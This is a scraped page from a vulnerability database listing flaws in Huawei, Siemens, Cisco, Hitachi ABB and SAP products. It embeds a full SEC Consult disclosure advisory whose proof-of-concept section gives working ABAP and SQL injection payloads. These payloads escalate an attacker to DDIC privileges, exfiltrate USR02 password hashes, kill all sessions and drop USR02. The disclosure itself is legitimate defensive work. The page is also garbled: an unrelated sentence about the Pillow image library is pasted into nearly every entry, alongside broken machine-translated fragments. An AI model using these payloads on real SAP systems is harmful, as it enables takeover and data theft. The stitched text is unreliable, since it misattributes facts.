VARIoT IoT vulnerabilities database

Password autocomplete vulnerability in the web application password field of Hitachi ABB Power Grids eSOMS allows attacker to gain access to user credentials that are stored by the browser. This issue affects: Hitachi ABB Power Grids eSOMS version 6.3 and prior versions. (CWE-522 , CVE-2021-35527) .Cross-site scripting in a third party or other application that has compromised your system XSS Password information may be stolen by a third party who exploits the vulnerability in). Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. A shift operation management system for the power generation industry

The Bluetooth function of some Huawei smartphones has a DoS vulnerability. Attackers can install third-party apps to send specific broadcasts, causing the Bluetooth module to crash. This vulnerability is successfully exploited to cause the Bluetooth function to become abnormal. Affected product versions include: HUAWEI P30 10.0.0.195(C432E22R2P5), 10.0.0.200(C00E85R2P11), 10.0.0.200(C461E6R3P1), 10.0.0.201(C10E7R5P1), 10.0.0.201(C185E4R7P1), 10.0.0.206(C605E19R1P3), 10.0.0.209(C636E6R3P4), 10.0.0.210(C635E3R2P4), and versions earlier than 10.1.0.165(C01E165R2P11). plural Huawei There are unspecified vulnerabilities in smartphones.Denial of service (DoS) It may be put into a state. Huawei P30 is a smart phone of China's Huawei (Huawei) company. There is an input verification error vulnerability in Huawei P30. The vulnerability stems from a vulnerability in the Bluetooth module of the product when processing broadcast data. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

There is a path traversal vulnerability in some Huawei products. The vulnerability is due to that the software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly validate the pathname. Successful exploit could allow the attacker to access a location that is outside of the restricted directory by a crafted filename. Affected product versions include:HUAWEI Mate 20 9.0.0.195(C01E195R2P1), 9.1.0.139(C00E133R3P1);HUAWEI Mate 20 Pro 9.0.0.187(C432E10R1P16), 9.0.0.188(C185E10R2P1), 9.0.0.245(C10E10R2P1), 9.0.0.266(C432E10R1P16), 9.0.0.267(C636E10R2P1), 9.0.0.268(C635E12R1P16), 9.0.0.278(C185E10R2P1); Hima-L29C 9.0.0.105(C10E9R1P16), 9.0.0.105(C185E9R1P16), 9.0.0.105(C636E9R1P16); Laya-AL00EP 9.1.0.139(C786E133R3P1); OxfordS-AN00A 10.1.0.223(C00E210R5P1); Tony-AL00B 9.1.0.257(C00E222R2P1). Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.X (All versions < V9.1 SP2), SIMATIC PDM (All versions < V9.2 SP2), SIMATIC STEP 7 V5.X (All versions < V5.7), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 SP2 HF1). A directory containing metafiles relevant to devices' configurations has write permissions. An attacker could leverage this vulnerability by changing the content of certain metafiles and subsequently manipulate parameters or behavior of devices that would be later configured by the affected software. Multiple Siemens products are vulnerable to improper assignment of permissions to critical resources.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Siemens SIMATIC PCS 7 is a set of process control system of Germany Siemens (Siemens) company. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform. SAP NetWeaver AS for ABA and ABAP Platform Is vulnerable to a lack of authentication.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. SEC Consult Vulnerability Lab Security Advisory < 20220518-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: SAP® Application Server ABAP and ABAP® Platform (Different Software Components) vulnerable version: see section "Vulnerable / tested versions" fixed version: see SAP security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832, CVE-2021-21465, CVE-2021-21468, CVE-2021-21466, CVE-2021-21473, CVE-2021-33678 impact: critical homepage: https://www.sap.com found: 08/2020 - 02/2021 by: Fabian Hagg (Office Vienna) Alexander Meier (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands. 77% of the world’s transaction revenue touches an SAP system [1, 2]. "SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3]. "The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4]. [1] https://www.sap.com/about/company.html [2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71 af511fa.html [3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/ en-US/797de8aa42e24916953c4bb3d983662d.html [4] https://developers.sap.com/topics/abap-platform.html Business recommendation: ------------------------ By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data. SEC Consult recommends to implement security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues are fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured. Vulnerability overview/description: ----------------------------------- Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security. Remote Function Call (RFC) is a proprietary network protocol by SAP SE. Comparable to application programming interfaces (APIs), SAP systems come with thousands of built-in function modules implemented in ABAP. RFC allows remote-enabled functions to be accessed via the network. This makes it possible to decentralize business applications even across system boundaries. External programs and external clients can make use of RFC connections to interact with an SAP system via libraries (e.g. NW RFC SDK) provisioned by SAP SE. This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform. 1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4 of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable to ABAP code injection bugs allowing to execute arbitrary ABAP code. Successful exploitation leads to full system compromise. 2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS) Function module CNV_MBT_SEL_STRING_RETURN of function group CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. 3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation) Function module CNV_GET_USERS_FOR_APP_SERVER of function group CNV_00001_HELP does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to retrieve internal information and to make a targeted SAP system completely unavailable to its intended users. The latter is to be considered as a Denial of Service (DoS) attack. 4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface) Function module RSDL_DB_GET_DATA_BWS of function group RSDL does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to read out the entire database including cross-client data access. 5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface) Function module RSDL_DB_GET_DATA_BWS of function group RSDL is vulnerable to a native SQL injection (ADBC) bug allowing to execute arbitrary SQL commands at database level. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. 6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to execute existing ABAP reports without holding sufficient authorizations. 8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework) Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains a code injection vulnerability with a limited exploitation primitive. An attacker can abuse this bug to delete critical system tables (e.g. USR02), making the targeted SAP system completely unavailable to its intended users. Proof of concept: ----------------- 1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform The vulnerable functions make use of the GENERATE SUBROUTINE POOL instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. This code gets executed on the fly by the application server in the course of execution of the functions. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: I_TABLNM Value: USR02 Import Table: I_T_SELECT_FIELDS ╒═══════════════════════════════════════════════════════════════╕ │ RSD_FIELDNM │ ╞═══════════════════════════════════════════════════════════════╡ │ BNAME │ ╘═══════════════════════════════════════════════════════════════╛ Import Table: I_T_WHERE_COND ╒═══════════╤══════╤════════════════════════════════════════════╕ │ FIELDNM │ OP │ LOW │ ╞═══════════╪══════╪════════════════════════════════════════════╡ │ BNAME │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET │ │ │ │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │ ╘═══════════╧══════╧════════════════════════════════════════════╛ 2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS) The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: TABNAME Value: USR02 Import Table: IMT_SELSTRING ╒══════════════════════════════════════════════════════════════╕ │ LINE │ ╞══════════════════════════════════════════════════════════════╡ │ BNAME = 'TEST'. ENDSELECT. │ ├──────────────────────────────────────────────────────────────┤ │ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │ ├──────────────────────────────────────────────────────────────┤ │ SELECT * FROM USR02 │ ╘══════════════════════════════════════════════════════════════╛ 3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation) The vulnerable function does not perform any explicit authorization check. Depending on a specific import parameter, the function leaks active logon sessions (opcode 02) or terminates all active logon sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function periodically prevents users from logging into the application server. The following payload exploits the bug to trigger the information disclosure and enumerate active user sessions: Import Parameter: MODE Value: 1 The following payload exploits the bug to terminate all active user sessions: Import Parameter: MODE Value: 2 4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface) The vulnerable function does not perform any explicit authorization check. It uses predefined classes and methods from the ABAP Database Connectivity (ADBC) framework to execute native SQL queries at database level. Depending on specific import parameters, this allows to read out arbitrary table data including user master records or secure storages (e.g. RSECTAB). The following payload exploits the bug to exfiltrate user password hashes: Import Table: I_S_TABSEL ╒══════════════════════════════════════════════════════════════╕ │ NAME │ ╞══════════════════════════════════════════════════════════════╡ │ USR02 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_S_DBCON ╒══════════════════════════════════════════════════════════════╕ │ CON_NAME │ ╞══════════════════════════════════════════════════════════════╡ │ <Database Connection String> (e.g. DEFAULT) │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_DBFIELDS ╒═══════════════╤═════════╤════════════════════════════════════╕ │ NAME │ TYPE │ LENGTH │ ╞═══════════════╪═════════╪════════════════════════════════════╡ │ BNAME │ CHAR255 │ 000255 │ ├───────────────┼─────────┼────────────────────────────────────┤ │ PWDSALTEDHASH │ CHAR255 │ 000255 │ ╘══════════════════════════════════════════════════════════════╛ 5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface) The vulnerable function does not perform any input validation or output sanitization on import parameters that can be used to define conditional SQL statements. This allows to inject arbitrary SQL commands that get executed natively at database level in the course of execution of the function. The following payload exploits the bug to escalate privileges via reference user assignment: Import Table: I_S_TABSEL ╒══════════════════════════════════════════════════════════════╕ │ NAME │ ╞══════════════════════════════════════════════════════════════╡ │ USR02 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_S_DBCON ╒══════════════════════════════════════════════════════════════╕ │ CON_NAME │ ╞══════════════════════════════════════════════════════════════╡ │ <Database Connection String> (e.g. DEFAULT) │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_DBFIELDS ╒═══════════════╤═════════╤════════════════════════════════════╕ │ NAME │ TYPE │ LENGTH │ ╞═══════════════╪═════════╪════════════════════════════════════╡ │ BNAME │ CHAR255 │ 000255 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_SELECT ╒══════════════════════╤════════╤══════════════════════════════╕ │ FIELDNM │ OPTION │LOW │ ╞══════════════════════╪════════╪══════════════════════════════╡ │ BNAME │ EQ │'';UPDATE USREFUS SET REFUSER │ │ │ │='DDIC' WHERE '1 │ ├──────────────────────┼────────┼──────────────────────────────┤ │ ' = '1 AND' AND BNAME│ EQ │'ATTACKER'; │ ╘══════════════════════════════════════════════════════════════╛ 6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: I_TABLE_NAME Value: INJECTION Import Parameter: I_DEBUG_SUFFIX Value: SAP Import Table: I_T_RANGE_STRING ╒═══════════╤═════════════════════════════════════╤════════════╕ │ CHANM │ LOW │ HIGH │ ╞═══════════╪═════════════════════════════════════╪════════════╡ │ BNAME │ '. UPDATE USREFUS SET REFUSER │ '. EXIT. " │ │ │ = 'DDIC' WHERE BNAME = 'ATTACKER │ │ ╘═══════════╧═════════════════════════════════════╧════════════╛ 7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform The vulnerable function uses a dynamically generated program name (based on data from untrusted sources) in a SUBMIT call. No authorization checks are programmatically enforced. Thus, a remote, unauthorized attacker can leverage this function to start any existing ABAP report by providing the respective report name in the import parameter REPORTNAME. 8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework) The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction in form 'get_dynamic_fields' by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. These parameters are limited in size due to their variable type. This restricts an attacker in exploitation scenarios. However, it is still possible, for example, to delete critical system tables by exploiting this bug. The following payload exploits the bug to drop table USR02, leading to a complete loss of availability of the target system: Import Parameter: RTABNAME Value: X. EXEC SQL. DROP TABLE USR02- Import Parameter: RFIELDNAME Value: ENDEXEC Vulnerable / tested versions: ----------------------------- All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04 and ABAP Platform 1909. No additional testing on other releases has been carried out. According to the vendor the following releases and versions are affected by the discovered vulnerabilities: 1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE 3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA (SAP Landscape Transformation), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE 4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730, 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200 Components: SAP_BW, DW4CORE 7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BASIS 8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F Components: SAP_ABA Vendor contact timeline: ------------------------ The following timelines have been split for each CVE/vulnerability, as different contacts were responsible. All identified vulnerabilities have been fixed by now by SAP and SEC Consult releases this security advisory adhering to the responsible disclosure policy. CVE-2020-6318 -------------------------------- 2020-08-12 | Contacting vendor with detailed report through vulnerability submission web form. 2020-08-13 | Vendor confirms receipt and assigns security incident number #2080354772. 2020-08-19 | Vendor confirms vulnerability. 2020-08-24 | Vendor informs about patch development strategy. 2020-09-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-09-08 | Vendor releases patch with SAP Security Note 2958563. CVE-2020-26808 -------------------------------- 2020-09-24 | Contacting vendor with detailed report through vulnerability submission web form. 2020-09-25 | Vendor confirms receipt and assigns security incident number #2070354293. 2020-10-20 | Contacting vendor to request progress information. 2020-10-21 | Vendor confirms vulnerability and states that a fix is in development. 2020-11-09 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-11-10 | Vendor releases patch with SAP Security Note 2973735. CVE-2020-26832 -------------------------------- 2020-10-23 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-26 | Vendor confirms receipt and assigns security incident number #2070432866. 2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6. 2020-11-23 | Vendor asks for exploit script shown in the initial report. 2020-11-24 | Providing the requested script via encrypted PGP mail. 2020-12-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-12-08 | Vendor releases patch with SAP Security Note 2993132. CVE-2021-21465 / CVE-2021-21468 -------------------------------- 2020-10-27 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-29 | Vendor confirms receipt and assigns separated security incident numbers #2070446047 and #2070446050. 2020-11-06 | Vendor confirms vulnerability and predicts patches to be released on December Patch Tuesday 2020. 2020-11-18 | Vendor confirms that they are still on track for December Patch Tuesday 2020. 2020-12-01 | Vendor informs that patch needs to be postponed to January Patch Tuesday 2021. 2021-01-08 | Vendor informs about release of patches and clarifies that a single security note will fix both issues. Additional information about CVSS scores is provided. 2021-01-11 | Vendor informs about release of the patches, registration of CVE numbers and corresponding security note. 2021-01-12 | Vendor releases patches with SAP Security Note 2986980. CVE-2021-21466 / CVE-2021-21473 -------------------------------- 2020-11-25 | Contacting vendor with detailed report through vulnerability submission web form. 2020-11-27 | Vendor confirms receipt and assigns security incident number #2080396648. 2021-01-04 | Vendor confirms vulnerability and states that they are working on a fix. Additional information is provided detailing on that they will split the reported finding into two separated security issues and security incident numbers #2080396648 and #2080412695. 2021-01-11 | Vendor informs about release of the first patch, registration of CVE number and corresponding security note. 2021-01-11 | Vendor informs about patch release for the first issue. Additional information is provided describing that a patch for the second issue is still in development. 2021-01-12 | Vendor releases first patch with SAP Security Note 2999854. 2021-05-07 | Asking vendor for update regarding the second issue. 2021-05-11 | Vendor informs that fix is in progress and note will be released soon. 2021-06-07 | Vendor informs about release of the second patch, registration of CVE number and corresponding security note. 2021-06-08 | Vendor releases second patch with SAP Security Note 3002517. CVE-2021-33678 -------------------------------- 2021-02-01 | Contacting vendor with detailed report through vulnerability submission web form. 2021-02-03 | Vendor confirms receipt and assigns security incident number #2180074995. 2021-05-07 | Asking vendor for update. 2021-05-11 | Vendor informs that fix is in progress. 2021-07-12 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2021-07-13 | Vendor releases patch with SAP Security Note 3048657. Solution: --------- SAP SE reacted promptly to our findings. Product Security Incident Response Team (PSRT) and engineers released patches in a timely manner for each of the reported issues. These patches are available in form of SAP Security Notes which can be accessed via the SAP Customer Launchpad [5]. More information can also be found at the Official SAP Product Security Response Space [6]. The following Security Notes need to be implemented: 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 [5] https://launchpad.support.sap.com/#/securitynotes [6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF F. Hagg, A. Meier / @2022

Affected devices contain a vulnerability that allows an unauthenticated attacker to trigger a denial of service condition. The vulnerability can be triggered if a large amount of DCP reset packets are sent to the device. Multiple Siemens products contain vulnerabilities in resource allocation without restrictions or throttling.Service operation interruption (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Siemens SCALANCE S602是德国西门子（Siemens）公司的一款工业安全设备. Siemens多款产品 存在安全漏洞，该漏洞允许攻击者执行拒绝服务攻击。以下产品和版本受到影响：Development/Evaluation Kits for PROFINET IO： DK Standard Ethernet Controller (All versions), Development/Evaluation Kits for PROFINET IO： EK-ERTEC 200 (All versions), Development/Evaluation Kits for PROFINET IO： EK-ERTEC 200P (All versions), RUGGEDCOM RM1224 (All Versions ＜ 6.4), SCALANCE M-800 (All Versions ＜ 6.4), SCALANCE S615 (All Versions ＜ 6.4), SCALANCE W1700 IEEE 802.11ac (All versions), SCALANCE W700 IEEE 802.11n (All versions), SCALANCE X200-4 P IRT (All Versions ＜ V5.5.0), SCALANCE X201-3P IRT (All Versions ＜ V5.5.0), SCALANCE X201-3P IRT PRO (All Versions ＜ V5.5.0), SCALANCE X202-2 IRT (All Versions ＜ V5.5.0), SCALANCE X202-2P IRT (incl. SIPLUS NET variant) (All Versions ＜ V5.5.0), SCALANCE X202-2P IRT PRO (All Versions ＜ V5.5.0), SCALANCE X204 IRT (All Versions ＜ V5.5.0), SCALANCE X204 IRT PRO (All Versions ＜ V5.5.0), SCALANCE X204-2 (incl. SIPLUS NET variant) (All versions), SCALANCE X204-2FM (All versions), SCALANCE X204-2LD (incl. SIPLUS NET variant) (All versions), SCALANCE X204-2LD TS (All versions), SCALANCE X204-2TS (All versions), SCALANCE X206-1 (All versions), SCALANCE X206-1LD (incl. SIPLUS NET variant) (All versions), SCALANCE X208 (incl. SIPLUS NET variant) (All versions), SCALANCE X208PRO (All versions), SCALANCE X212-2 (All versions), SCALANCE X212-2LD (All versions), SCALANCE X216 (All versions), SCALANCE X224 (All versions), SCALANCE X302-7EEC (All versions), SCALANCE X304-2FE (All versions), SCALANCE X306-1LDFE (All versions), SCALANCE X307-2EEC (All versions), SCALANCE X307-3 (All versions), SCALANCE X307-3LD (All versions), SCALANCE X308-2 (incl. SIPLUS NET variant) (All versions), SCALANCE X308-2LD (All versions), SCALANCE X308-2LH (All versions), SCALANCE X308-2LH+ (All versions), SCALANCE X308-2M (All versions), SCALANCE X308-2M POE (All versions), SCALANCE X308-2M TS (All versions), SCALANCE X310 (All versions), SCALANCE X310FE (All versions), SCALANCE X320-1FE (All versions), SCALANCE X320-3LDFE (All versions), SCALANCE XB-200 (All versions), SCALANCE XC-200 (All versions), SCALANCE XF-200BA (All versions), SCALANCE XF201-3P IRT (All Versions ＜ V5.5.0), SCALANCE XF202-2P IRT (All Versions ＜ V5.5.0), SCALANCE XF204 (All versions), SCALANCE XF204 IRT (All Versions ＜ V5.5.0), SCALANCE XF204-2 (incl. SIPLUS NET variant) (All versions), SCALANCE XF204-2BA IRT (All Versions ＜ V5.5.0), SCALANCE XF206-1 (All versions), SCALANCE XF208 (All versions), SCALANCE XM400 (All versions ＜ V6.3.1), SCALANCE XP-200 (All versions), SCALANCE XR-300WG (All versions), SCALANCE XR324-12M (All versions), SCALANCE XR324-12M TS (All versions), SCALANCE XR324-4M EEC (All versions), SCALANCE XR324-4M POE (All versions), SCALANCE XR324-4M POE TS (All versions), SCALANCE XR500 (All versions ＜ V6.3.1), SIMATIC CFU PA (All versions), SIMATIC IE/PB-LINK V3 (All versions), SIMATIC MV500 family (All versions ＜ V3.0), SIMATIC NET CM 1542-1 (All versions), SIMATIC NET CP1616/CP1604 (All Versions ＞= V2.7), SIMATIC NET CP1626 (All versions), SIMATIC NET DK-16xx PN IO (All Versions ＞= V2.7), SIMATIC PROFINET Driver (All versions), SIMATIC Power Line Booster PLB, Base Module (MLFB： 6ES7972-5AA10-0AB0) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All Versions ＜ V4.5), SIMOCODE proV Ethernet/IP (All versions ＜ V1.1.3), SIMOCODE proV PROFINET (All versions ＜ V2.1.3), SOFTNET-IE PNIO (All versions)

A vulnerability in the vDaemon process of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a device to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient handling of malformed packets. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco SD-WAN The software contains an input verification vulnerability.Denial of service (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Cisco SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization

A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to overwrite arbitrary files in the underlying file system of an affected system. This vulnerability is due to insufficient validation of the user-supplied input parameters of a specific CLI command. An attacker could exploit this vulnerability by issuing that command with specific parameters. A successful exploit could allow the attacker to overwrite the content in any arbitrary files that reside on the underlying host file system. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Cisco SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization

There is a denial of service vulnerability in Huawei products. A module cannot deal with specific messages due to validating inputs insufficiently. Attackers can exploit this vulnerability by sending specific messages to affected module. This can cause denial of service. Affected product versions include: S12700 V200R013C00SPC500, V200R019C00SPC500; S5700 V200R013C00SPC500, V200R019C00SPC500; S6700 V200R013C00SPC500, V200R019C00SPC500; S7700 V200R013C00SPC500, V200R019C00SPC500. plural Huawei product There is an input validation vulnerability in.Service operation interruption (DoS) It may be in a state. Huawei S12700 is an enterprise-class switch product of China's Huawei (Huawei) company. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V21.9), SIMATIC S7 PLCSIM Advanced (All versions > V2 < V4), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (Version V4.4), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions > V2.5 < V2.9.2), SIMATIC S7-1500 Software Controller (All versions > V2.5 < V21.9), TIM 1531 IRC (incl. SIPLUS NET variants) (Version V2.1). Due to an incorrect authorization check in the affected component, an attacker could extract information about access protected PLC program variables over port 102/tcp from an affected device when reading multiple attributes at once. Multiple Siemens products contain fraudulent authentication vulnerabilities.Information may be obtained. Siemens SIMATIC S7-1500 CPU and SIMATIC S7-1500 are the products of Germany Siemens (Siemens) company. The SIMATIC S7-1500 CPU is a CPU (Central Processing Unit) module. The SIMATIC S7-1500 is a programmable logic controller. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

